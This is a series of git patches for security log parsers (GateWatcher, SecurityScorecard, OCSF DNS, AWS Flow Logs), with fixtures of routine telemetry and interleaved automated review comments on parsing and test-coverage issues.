+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 1135,
+ "mime_type": "application/pdf",
+ "status_code": 200
+ },
+ "version": "HTTP/1.1"
+ },
+ "network": {
+ "community_id": "1:8T6+TppVoaMkXwi+BTjnzAYozVc=",
+ "protocol": "http",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "56.53.117.115",
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "56.53.117.115",
+ "65.100.113.120"
+ ]
+ },
+ "source": {
+ "address": "65.100.113.120",
+ "ip": "65.100.113.120",
+ "mac": "00:6f:37:76:51:45",
+ "port": 62832
+ },
+ "url": {
+ "domain": "56.53.117.115",
+ "path": "/malcore_10KB_clean.pdf"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
new file mode 100644
index 000000000..f6c5e07ee
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
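Review bot: The expected `gatewatcher.sigflow.metadata` and `gatewatcher.sigflow.packet_info` are double-encoded JSON: `metadata` is the text `{"attack_target": ["Client_Endpoint"], ...}` stored as one string and `packet_info` is the string `{"linktype": 1}`, whereas nba.json in the same commit keeps `gatewatcher.nba.metadata` as a real object with `performance_impact`/`signature_severity` arrays. A consumer cannot filter sigflow alerts on `signature_severity` or `attack_target` without re-parsing the string, and the two modules diverge for what is the same Suricata-style metadata block. If `gatewatcher.sigflow.metadata` is declared as a keyword in fields.yml (not in this chunk) that explains the serialisation, but an object type, or at least the handful of sub-fields rules actually key on, would be the better contract; `packet_info` would likewise be more useful as `gatewatcher.sigflow.packet_info.linktype` with an integer value.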
@@ -0,0 +1,48 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\"\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"metric\",\n \"dataset\": \"system_metrics\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"sigflow_stats\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"stats\": {\n \"app_layer\": {},\n \"tcp\": {},\n \"uptime\": 443637,\n \"ftp\": {},\n \"flow_bypassed\": {},\n \"decoder\": {},\n \"detect\": {},\n \"defrag\": {},\n \"flow\": {},\n \"capture\": {},\n \"http\": {},\n \"file_store\": {}\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\"\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"metric\",\n \"dataset\": \"system_metrics\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"sigflow_stats\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"stats\": {\n \"app_layer\": {},\n \"tcp\": {},\n \"uptime\": 443637,\n \"ftp\": {},\n \"flow_bypassed\": {},\n \"decoder\": {},\n \"detect\": {},\n \"defrag\": {},\n \"flow\": {},\n \"capture\": {},\n \"http\": {},\n \"file_store\": {}\n },\n \"@version\": 
\"1\",\n \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "system_metrics",
+ "kind": "metric",
+ "module": "sigflow_stats"
+ },
+ "@timestamp": "2022-09-01T10:49:46.643000Z",
+ "gatewatcher": {
+ "event": {
+ "created": "2022-12-14T09:51:30.455000Z",
+ "id": "f14ab432-7e97-4570-a29d-254f41dbb9db"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-interne-rd-55.gatewatcher.com",
+ "version": "2.5.3.107"
+ },
+ "log_format_version": "1.0.0"
+ },
+ "version": "1"
+ },
+ "observer": {
+ "hostname": "gcenter-interne-rd-56.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-interne-rd-56.gatewatcher.com"
+ ]
+ }
+ }
+}
\ No newline at end of file
From 693134cf5c046709e1f8de03ec7914e70858974b Mon Sep 17 00:00:00 2001
From: Clement Lyonnet
Date: Mon, 16 Sep 2024 14:29:58 +0200
Subject: [PATCH 027/317] Delete a line
---
GateWatcher/aioniq/ingest/parser.yml | 1 -
1 file changed, 1 deletion(-)
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 894264d2b..7679c02a1 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -240,4 +240,3 @@ stages:
gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}'
filter: ''
name: set
-
From 1123c27bae68431662f2d6c274b48a617026f0c8 Mon Sep 17 00:00:00 2001
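Review bot: This fixture exercises `stats` only with empty sub-objects (`app_layer`, `tcp`, `decoder`, `flow`, ... are all `{}`) and the one populated value, `stats.uptime` (443637), is absent from the expected `gatewatcher` object, so the test does not demonstrate how any counter is mapped and a regression that silently drops all stats would still pass. A second record with populated `capture`/`flow`/`decoder` counters, or at least `uptime` mapped to a numeric field, would make the metric path verifiable. Whether the parser intentionally ignores `stats` cannot be determined from this chunk, so treat this as a coverage gap to confirm rather than a confirmed mapping bug.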
From: LenaigKaliou
Date: Mon, 16 Sep 2024 16:34:25 +0200
Subject: [PATCH 028/317] Enhancement/SecurityScoreCard: Add custom fields
---
.../_meta/fields.yml | 15 +++++++
.../ingest/parser.yml | 3 ++
.../tests/breach_reported_event.json | 3 +-
.../{issue_event.json => issue_event_01.json} | 3 +-
.../tests/issue_event_02.json | 44 +++++++++++++++++++
.../tests/issue_event_03.json | 44 +++++++++++++++++++
6 files changed, 110 insertions(+), 2 deletions(-)
rename SecurityScorecard/vulnerability_assessment_scanner/tests/{issue_event.json => issue_event_01.json} (96%)
create mode 100644 SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
create mode 100644 SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml b/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
index 98504880c..f425d610d 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
+++ b/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
@@ -3,11 +3,21 @@ securityscorecard.vas.breach.root_cause:
name: securityscorecard.vas.breach.root_cause
type: keyword
+securityscorecard.vas.current_score:
+ description: Scorecard current score
+ name: securityscorecard.vas.current_score
+ type: number
+
securityscorecard.vas.id:
description: Scorecard event id
name: securityscorecard.vas.id
type: keyword
+securityscorecard.vas.previous_score:
+ description: Scorecard previous score
+ name: securityscorecard.vas.previous_score
+ type: number
+
securityscorecard.vas.selected:
description: Scorecard event selected
name: securityscorecard.vas.selected
@@ -17,3 +27,8 @@ securityscorecard.vas.severity:
description: Scorecard event severity
name: securityscorecard.vas.severity
type: keyword
+
+securityscorecard.vas.type:
+ description: Scorecard event type
+ name: securityscorecard.vas.type
+ type: keyword
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml b/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
index 0d72affb2..6e71ead09 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
+++ b/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
@@ -33,9 +33,12 @@ stages:
cloud.account.name: "{{parsed_event.message.domain}}"
organization.name: "{{parsed_event.message.trigger.breach.company_name}}"
+ securityscorecard.vas.current_score: "{{parsed_event.message.current.score}}"
securityscorecard.vas.id: "{{parsed_event.message.scorecard_id}}"
+ securityscorecard.vas.previous_score: "{{parsed_event.message.previous.score}}"
securityscorecard.vas.selected: "{{parsed_event.message.trigger.selected}}"
securityscorecard.vas.severity: "{{parsed_event.message.trigger.severity}}"
+ securityscorecard.vas.type: "{{parsed_event.message.trigger.type}}" - set: event.kind: "alert"
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
index 7d98930f7..2a1ecd7c3 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
@@ -34,7 +34,8 @@
"breach": {
"root_cause": "hacked"
},
- "id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586"
+ "id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586",
+ "type": "breach_reported"
}
}
}
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
similarity index 96%
rename from SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json
rename to SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
index a4b803c07..fcbd60ed0 100644
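Review bot: The three new `set` entries render `parsed_event.message.current.score`, `parsed_event.message.previous.score` and `parsed_event.message.trigger.type` unconditionally, with no `filter` guarding on the keys being present. The updated breach_reported_event.json fixture in this same commit gains only `type` and no `current_score`/`previous_score`, which suggests a missing key renders empty and is discarded rather than failing, but that is inferred from the fixture, not visible here; a one-line comment such as `# current/previous are absent on breach_reported triggers; an empty render is dropped` above the new lines would make the contract explicit, or a `filter` on `parsed_event.message.get('current') != None` would make it enforced. Separately, issue_event_02.json shows `securityscorecard.vas.type` carrying the same value as `event.action` (`new_issues`), so the new field duplicates an ECS field unless the two are meant to diverge for some trigger types; worth a note on why both exist. The enclosing `- set:` stage starts before this hunk.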
--- a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
@@ -28,7 +28,8 @@
"vas": {
"id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586",
"selected": "by_severity",
- "severity": "low"
+ "severity": "low",
+ "type": "new_issues"
}
}
}
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
new file mode 100644
index 000000000..e90b95d98
--- /dev/null
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\n \"trigger\": {\n \"type\": \"new_issues\",\n \"issues\": {\n \"tls_weak_protocol\": {\n \"departed\": { \"count\": 1 },\n \"active\": { \"count\": 1 }\n },\n \"tls_weak_cipher\": {\n \"departed\": { \"count\": 2 },\n \"active\": { \"count\": 2 }\n }\n },\n \"selected\": \"by_severity\",\n \"severity\": \"low\"\n },\n \"created_at\": \"2024-07-12T04:54:27.941Z\",\n \"execution_id\": \"8a1be922-6698-4407-ba70-0515943d323e\",\n \"scorecard_id\": \"56f0fca6-f6e0-55fd-9fce-b75ba65db80e\",\n \"domain\": \"example.com\",\n \"previous\": { \"score\": 90, \"factors\": {} },\n \"current\": { \"score\": 90, \"factors\": {} },\n \"platform_score_date\": 20240710\n}", + "sekoiaio": { + "intake": { + "dialect": "SecurityScorecard Vulnerability Assessment Scanner", + "dialect_uuid": "8f472113-ba5b-45b9-9a2c-944834396333" + } + } + }, + "expected": { + "message": "{\n \"trigger\": {\n \"type\": \"new_issues\",\n \"issues\": {\n \"tls_weak_protocol\": {\n \"departed\": { \"count\": 1 },\n \"active\": { \"count\": 1 }\n },\n \"tls_weak_cipher\": {\n \"departed\": { \"count\": 2 },\n \"active\": { \"count\": 2 }\n }\n },\n \"selected\": \"by_severity\",\n \"severity\": \"low\"\n },\n \"created_at\": \"2024-07-12T04:54:27.941Z\",\n \"execution_id\": \"8a1be922-6698-4407-ba70-0515943d323e\",\n \"scorecard_id\": \"56f0fca6-f6e0-55fd-9fce-b75ba65db80e\",\n \"domain\": \"example.com\",\n \"previous\": { \"score\": 90, \"factors\": {} },\n \"current\": { \"score\": 90, \"factors\": {} },\n \"platform_score_date\": 20240710\n}", + "event": { + "action": "new_issues", + "category": [ + "vulnerability" + ], + "dataset": "issue", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-12T04:54:27.941000Z", + "cloud": { + "account": { + "name": "example.com" + } + }, + "observer": { + "product": "Vulnerability Assessment Scanner", + "vendor": "SecurityScorecard" + }, + "securityscorecard": { + "vas": { + "current_score": 90, + "id": 
"56f0fca6-f6e0-55fd-9fce-b75ba65db80e",
+ "previous_score": 90,
+ "selected": "by_severity",
+ "severity": "low",
+ "type": "new_issues"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json
new file mode 100644
index 000000000..4ccd274c8
--- /dev/null
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\n \"trigger\": {\n \"type\": \"new_issues\",\n \"issues\": {\n \"tlscert_excessive_expiration\": { \"active\": { \"count\": 1 } },\n \"tlscert_no_revocation\": { \"active\": { \"count\": 1 } },\n \"csp_no_policy_v2\": { \"active\": { \"count\": 1 } },\n \"insecure_https_redirect_pattern_v2\": { \"active\": { \"count\": 3 } },\n \"redirect_chain_contains_http_v2\": { \"active\": { \"count\": 9 } },\n \"tls_weak_protocol\": {\n \"departed\": { \"count\": 1 },\n \"active\": { \"count\": 1 }\n },\n \"tls_weak_cipher\": { \"active\": { \"count\": 1 } },\n \"unsafe_sri_v2\": { \"active\": { \"count\": 1 } },\n \"hsts_incorrect_v2\": { \"active\": { \"count\": 1 } },\n \"x_content_type_options_incorrect_v2\": { \"active\": { \"count\": 1 } }\n },\n \"selected\": \"by_severity\",\n \"severity\": \"low\"\n },\n \"created_at\": \"2024-07-11T07:47:17.165Z\",\n \"execution_id\": \"4c5395cc-0161-402f-896f-477966c2386d\",\n \"scorecard_id\": \"d332f6dd-ec0e-57bf-9086-31ddd68095c9\",\n \"domain\": \"example.com\",\n \"previous\": {\n \"score\": 88,\n \"factors\": { \"application_security\": 85, \"network_security\": 85 }\n },\n \"current\": {\n \"score\": 88,\n \"factors\": { \"application_security\": 84, \"network_security\": 84 }\n },\n \"platform_score_date\": 20240709\n}", + "sekoiaio": { + "intake": { + "dialect": "SecurityScorecard Vulnerability Assessment Scanner", + "dialect_uuid": "8f472113-ba5b-45b9-9a2c-944834396333" + } + } + }, + "expected": { + "message": "{\n \"trigger\": {\n \"type\": \"new_issues\",\n \"issues\": {\n \"tlscert_excessive_expiration\": { \"active\": { \"count\": 1 } },\n \"tlscert_no_revocation\": { \"active\": { \"count\": 1 } },\n \"csp_no_policy_v2\": { \"active\": { \"count\": 1 } },\n \"insecure_https_redirect_pattern_v2\": { \"active\": { \"count\": 3 } },\n \"redirect_chain_contains_http_v2\": { \"active\": { \"count\": 9 } },\n \"tls_weak_protocol\": {\n \"departed\": { \"count\": 1 },\n 
\"active\": { \"count\": 1 }\n },\n \"tls_weak_cipher\": { \"active\": { \"count\": 1 } },\n \"unsafe_sri_v2\": { \"active\": { \"count\": 1 } },\n \"hsts_incorrect_v2\": { \"active\": { \"count\": 1 } },\n \"x_content_type_options_incorrect_v2\": { \"active\": { \"count\": 1 } }\n },\n \"selected\": \"by_severity\",\n \"severity\": \"low\"\n },\n \"created_at\": \"2024-07-11T07:47:17.165Z\",\n \"execution_id\": \"4c5395cc-0161-402f-896f-477966c2386d\",\n \"scorecard_id\": \"d332f6dd-ec0e-57bf-9086-31ddd68095c9\",\n \"domain\": \"example.com\",\n \"previous\": {\n \"score\": 88,\n \"factors\": { \"application_security\": 85, \"network_security\": 85 }\n },\n \"current\": {\n \"score\": 88,\n \"factors\": { \"application_security\": 84, \"network_security\": 84 }\n },\n \"platform_score_date\": 20240709\n}", + "event": { + "action": "new_issues", + "category": [ + "vulnerability" + ], + "dataset": "issue", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-11T07:47:17.165000Z", + "cloud": { + "account": { + "name": "example.com" + } + }, + "observer": { + "product": "Vulnerability Assessment Scanner", + "vendor": "SecurityScorecard" + }, + "securityscorecard": { + "vas": { + "current_score": 88, + "id": "d332f6dd-ec0e-57bf-9086-31ddd68095c9", + "previous_score": 88, + "selected": "by_severity", + "severity": "low", + "type": "new_issues" + } + } + } +} \ No newline at end of file From 776cabfdee06228b01e99b467f420e98c10bba8b Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 16 Sep 2024 16:38:59 +0200 Subject: [PATCH 029/317] fix(OCSF): fix the way to extract dns.id and dns.answers --- OCSF/ocsf/ingest/parser.yml | 21 +++---- OCSF/ocsf/tests/test_dns_activity_1.json | 17 +++--- OCSF/ocsf/tests/test_dns_activity_2.json | 73 ++++++++++++++++++++++++ 3 files changed, 91 insertions(+), 20 deletions(-) create mode 100644 OCSF/ocsf/tests/test_dns_activity_2.json 
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 91d9dd4e0..d63d70d8d 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -919,18 +919,19 @@ stages:
 - set:
 dns.question.name: "{{ parse_event.message.query.hostname }}"
 - set:
- dns.id: >
+ dns.id: "{{ parse_event.message.query.packet_uid }}"
+ dns.answers: >
 [
- {%- for item in parse_event.message.answers -%}{% if item.packed_uid %}'{{item.packet_uid}}',{% endif %}{%- endfor -%}
- {% if parse_event.message.query.packet_uid != null %}'{{ parse_event.message.query.packet_uid }}'{% endif %}
+ {%- for item in parse_event.message.answers -%}
+ {
+ {%- if item.class != null -%}"class": "{{item.class}}",{%- endif -%}
+ {%- if item.type != null -%}"type": "{{item.type}}",{%- endif -%}
+ {%- if item.ttl != null -%}"ttl": "{{item.ttl}}",{%- endif -%}
+ {%- if item.rdata != null -%}"data": "{{item.rdata}}",{%- endif -%}
+ }
+ {%- endfor -%}
 ]
- dns.answers.class: >
- [{%- for item in parse_event.message.answers -%}{%- if item.class -%}'{{item.class}}',{%- endif -%}{%- endfor -%}]
- dns.answers.type: >
- [{%- for item in parse_event.message.answers -%}{%- if item.type -%}'{{item.type}}',{%- endif -%}{%- endfor -%}]
- dns.answers.ttl: >
- [{%- for item in parse_event.message.answers -%}{%- if item.ttl -%}'{{item.ttl}}',{%- endif -%}{%- endfor -%}]
- filter: "{{ parse_event.message.answers != null }}"
+ filter: "{{ parse_event.message.get('answers') != None }}"
 - set:
 dns.question.class:
 - "{{ parse_event.message.query.class }}"
diff --git a/OCSF/ocsf/tests/test_dns_activity_1.json b/OCSF/ocsf/tests/test_dns_activity_1.json
index 7567bb466..813601c8c 100644
--- a/OCSF/ocsf/tests/test_dns_activity_1.json
+++ b/OCSF/ocsf/tests/test_dns_activity_1.json
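Review bot: The `dns.answers` loop emits one `{ … }` per answer with no separator between iterations and a trailing comma inside each object, so any response with two or more answers renders `[ {…,} {…,} ]` and the field is lost; the only fixture (test_dns_activity_1.json) has a single answer and cannot catch this. The values are also spliced unescaped into double-quoted literals, and `rdata` is content chosen by whoever answers the query (TXT records routinely contain quotes), so one such answer silently drops `dns.answers` for the event — a parsing gap a detection pipeline should not have — and `ttl` becomes a string although ECS `dns.answers.ttl` is a long. Separately, `dns.id` now lives in a `set` whose `filter` requires `answers`, so a response with `answers: null` (the new test_dns_activity_2.json case) never gets `dns.id` even when `query.packet_uid` is present. Building the entries as dicts and rendering the list, as below, addresses all three; it assumes `query` is a plain mapping like `message` and that the engine reads the rendered list the way it already reads the `[...]` bodies.
```yaml
- set:
    dns.id: "{{ parse_event.message.query.packet_uid }}"
  filter: "{{ parse_event.message.query.get('packet_uid') != None }}"
- set:
    dns.answers: >
      {%- set answers = [] -%}
      {%- for item in parse_event.message.answers -%}
      {%- set answer = {} -%}
      {%- if item.get("class") != None -%}{%- set _ = answer.update({"class": item.class}) -%}{%- endif -%}
      {%- if item.get("type") != None -%}{%- set _ = answer.update({"type": item.type}) -%}{%- endif -%}
      {%- if item.get("ttl") != None -%}{%- set _ = answer.update({"ttl": item.ttl}) -%}{%- endif -%}
      {%- if item.get("rdata") != None -%}{%- set _ = answer.update({"data": item.rdata}) -%}{%- endif -%}
      {%- set _ = answers.append(answer) -%}
      {%- endfor -%}
      {{ answers }}
  filter: "{{ parse_event.message.get('answers') != None }}"
# … unchanged: dns.question.class stage …
```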
@@ -25,16 +25,13 @@
 "region": "us-east-1"
 },
 "dns": {
- "answers": {
- "class": [
- "IN"
- ],
- "ttl": [],
- "type": [
- "A"
- ]
- },
- "id": [],
+ "answers": [
+ {
+ "class": "IN",
+ "data": "127.0.0.62",
+ "type": "A"
+ }
+ ],
 "question": {
 "class": [
 "IN"
diff --git a/OCSF/ocsf/tests/test_dns_activity_2.json b/OCSF/ocsf/tests/test_dns_activity_2.json
new file mode 100644
index 000000000..5785c3053
--- /dev/null
+++ b/OCSF/ocsf/tests/test_dns_activity_2.json
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":63115,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726088328000,\"time_dt\":1726088328000,\"query\":{\"hostname\":\"_ldap._tcp.dc.example.org.\",\"type\":\"SRV\",\"class\":\"IN\"},\"answers\":null,\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":3,\"rcode\":\"NXDomain\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"query.hostname\",\"value\":\"_ldap._tcp.dc.example.org.\",\"type\":\"Hostname\",\"type_id\":1},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n", + "sekoiaio": { + "intake": { + "dialect": "OCSF", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + } + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query 
Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":63115,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726088328000,\"time_dt\":1726088328000,\"query\":{\"hostname\":\"_ldap._tcp.dc.example.org.\",\"type\":\"SRV\",\"class\":\"IN\"},\"answers\":null,\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":3,\"rcode\":\"NXDomain\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"query.hostname\",\"value\":\"_ldap._tcp.dc.example.org.\",\"type\":\"Hostname\",\"type_id\":1},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n", + "event": { + "action": "traffic", + "category": [ + "network" + ], + "kind": "event", + "severity": 1, + "type": [ + "info", + "protocol" + ] + }, + "@timestamp": "2024-09-11T20:58:48Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "provider": "AWS", + "region": "eu-west-3" + }, + "dns": { + "question": { + "class": [ + "IN" + ], + "name": "_ldap._tcp.dc.example.org.", + "registered_domain": "example.org", + "subdomain": "_ldap._tcp.dc", + "top_level_domain": "org", + "type": [ + "SRV" + ] + }, + "response_code": "NXDomain" + }, + "network": { + "direction": [ + 
"unknown"
+ ]
+ },
+ "ocsf": {
+ "activity_id": 6,
+ "activity_name": "Traffic",
+ "class_name": "DNS Activity",
+ "class_uid": 4003
+ },
+ "related": {
+ "hosts": [
+ "_ldap._tcp.dc.example.org."
+ ],
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 63115
+ }
+ }
+}
\ No newline at end of file
From fbdea857643f97c9502b26c3a9ac72a3aaf034fb Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 16 Sep 2024 17:00:00 +0200
Subject: [PATCH 030/317] AWS Flow Logs: Add custom fields
---
AWS/aws-flow-logs/_meta/fields.yml | 10 +++
AWS/aws-flow-logs/ingest/parser.yml | 3 +
AWS/aws-flow-logs/tests/network_traffic.json | 73 ++++++++++++++++++++
3 files changed, 86 insertions(+)
create mode 100644 AWS/aws-flow-logs/tests/network_traffic.json
diff --git a/AWS/aws-flow-logs/_meta/fields.yml b/AWS/aws-flow-logs/_meta/fields.yml
index 496e3f21f..cef232431 100644
--- a/AWS/aws-flow-logs/_meta/fields.yml
+++ b/AWS/aws-flow-logs/_meta/fields.yml
@@ -17,3 +17,13 @@ action.type:
 description: The type of the action
 name: action.type
 type: keyword
+
+aws.flowlogs.subnet.id:
+ description: The ID of the subnet
+ name: aws.flowlogs.subnet.id
+ type: keyword
+
+aws.flowlogs.vpc.id:
+ description: The ID of the VPC
+ name: aws.flowlogs.vpc.id
+ type: keyword
diff --git a/AWS/aws-flow-logs/ingest/parser.yml b/AWS/aws-flow-logs/ingest/parser.yml
index dd21da061..94b310eb5 100644
--- a/AWS/aws-flow-logs/ingest/parser.yml
+++ b/AWS/aws-flow-logs/ingest/parser.yml
@@ -32,8 +32,11 @@ stages:
 - set:
 action.outcome: "{{parse_event.message.log_status | lower}}"
 action.type: "forward"
+ aws.flowlogs.subnet.id: "{{parse_event.message.subnet_id}}"
+ aws.flowlogs.vpc.id: "{{parse_event.message.vpc_id}}"
 cloud.provider: "aws"
 cloud.account.id: "{{parse_event.message.account_id}}"
+ cloud.instance.id: "{{parse_event.message.instance_id}}"
 destination.port: "{{parse_event.message.dstport}}"
 event.category: '["network"]'
 event.start: "{{parse_start_date.datetime}}"
diff --git a/AWS/aws-flow-logs/tests/network_traffic.json b/AWS/aws-flow-logs/tests/network_traffic.json
new file mode 100644
index 000000000..3c668b6a6
--- /dev/null
+++ b/AWS/aws-flow-logs/tests/network_traffic.json
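Review bot: `cloud.instance.id` is mapped straight from `instance_id`, but VPC Flow Logs use `-` for fields that do not apply, and the new network_traffic.json fixture has exactly that (`\"instance_id\":\"-\"`) while its expected output carries no `cloud.instance.id`, so something outside this hunk must be discarding the dash; the same applies to `subnet_id` and `vpc_id`, which can also be `-`. Making the rule explicit keeps a literal `-` from ever landing in an ECS identity field if that downstream behaviour changes, e.g. move the mapping to its own action: `- set:` / `cloud.instance.id: "{{parse_event.message.instance_id}}"` / `filter: "{{parse_event.message.get('instance_id') not in [None, '-']}}"`. The enclosing `set` starts inside the hunk but its remaining mappings continue below it.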
